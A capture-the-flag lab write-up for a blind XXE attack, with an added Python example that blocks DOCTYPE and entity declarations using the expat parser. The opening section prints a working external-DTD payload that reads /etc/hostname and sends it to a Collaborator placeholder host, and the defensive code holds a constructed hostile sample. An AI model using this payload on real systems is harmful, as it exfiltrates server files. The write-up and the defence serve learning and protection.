
We first hosted the malicious external DTD on the lab's "Exploit server", inserting our Burp Collaborator subdomain into the exfiltration entity:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>">
%eval;
%exfil;
We then placed the payload below (pointing at the URL of the hosted DTD) into the request to the vulnerable function and sent it:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>
The application responded with "XML Parsing Error", which is expected: the parameter entities are resolved before the error is raised, so the exfiltration still happens.
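The chain above only works because the server-side parser is willing to process a DOCTYPE, declare parameter entities and fetch an external DTD. The following is an added example, not part of the lab write-up, showing how a defender can refuse exactly those constructs with the standard-library expat parser before any entity is acted on. The sample documents and the `dtd-host.invalid` URL are constructed for the example.

```python
"""Reject DTD constructs in untrusted XML using the stdlib expat parser.

Added example (not from the lab write-up). The sample documents below are
constructed; the DTD URL is a placeholder.
"""
import xml.parsers.expat as expat


class DtdRejected(ValueError):
    """Raised as soon as the document declares a DOCTYPE or any entity."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse `data` into {'root': name, 'elements': count, 'text': str}.

    Any DOCTYPE, entity declaration or external entity reference aborts the
    parse immediately, which removes the %xxe; -> %eval; -> %exfil; chain
    that the blind exfiltration relies on.
    """
    parser = expat.ParserCreate()
    # Never expand parameter entities (the %name; mechanism used by the DTD).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    summary = {"root": None, "elements": 0, "text": ""}

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at '<!DOCTYPE ...', before the internal subset is read.
        raise DtdRejected(f"DOCTYPE {name!r} not permitted (SYSTEM={sysid!r})")

    def entity_decl(name, is_param, value, base, sysid, pubid, notation):
        kind = "parameter" if is_param else "general"
        raise DtdRejected(f"{kind} entity {name!r} not permitted (SYSTEM={sysid!r})")

    def external_ref(context, base, sysid, pubid):
        raise DtdRejected(f"external entity reference to {sysid!r} not permitted")

    def start_element(name, attrs):
        if summary["root"] is None:
            summary["root"] = name
        summary["elements"] += 1

    def char_data(text):
        summary["text"] += text

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data

    parser.Parse(data, True)
    return summary


def classify(data: bytes) -> str:
    """Return 'accepted', 'rejected: <reason>' or 'malformed: <reason>'.

    The rejected/malformed strings are meant to be logged: a burst of
    'rejected: DOCTYPE' events is a useful detection signal for XXE probing.
    """
    try:
        parse_untrusted_xml(data)
        return "accepted"
    except DtdRejected as exc:
        return f"rejected: {exc}"
    except expat.ExpatError as exc:
        return f"malformed: {exc}"


# Constructed samples: a harmless request body, and the same body carrying
# the external-DTD trigger in the shape shown in the write-up.
BENIGN = b'<?xml version="1.0"?><order><item>widget</item><qty>2</qty></order>'
HOSTILE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://dtd-host.invalid/evil.dtd"> %xxe;]>'
    b'<order><item>widget</item><qty>2</qty></order>'
)

if __name__ == "__main__":
    print(classify(BENIGN))   # accepted
    print(classify(HOSTILE))  # rejected: DOCTYPE 'foo' not permitted (SYSTEM=None)
```

The important design choice is to fail in the DOCTYPE handler rather than in the external-reference handler: by the time a parser asks for the external DTD it may already have been instructed to fetch it, whereas refusing the DOCTYPE up front means no entity is ever declared, let alone resolved.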

On checking the Collaborator, we saw that the incoming HTTP request carried the machine's hostname as the value of the 'x' parameter.

We submitted the username and solved the lab.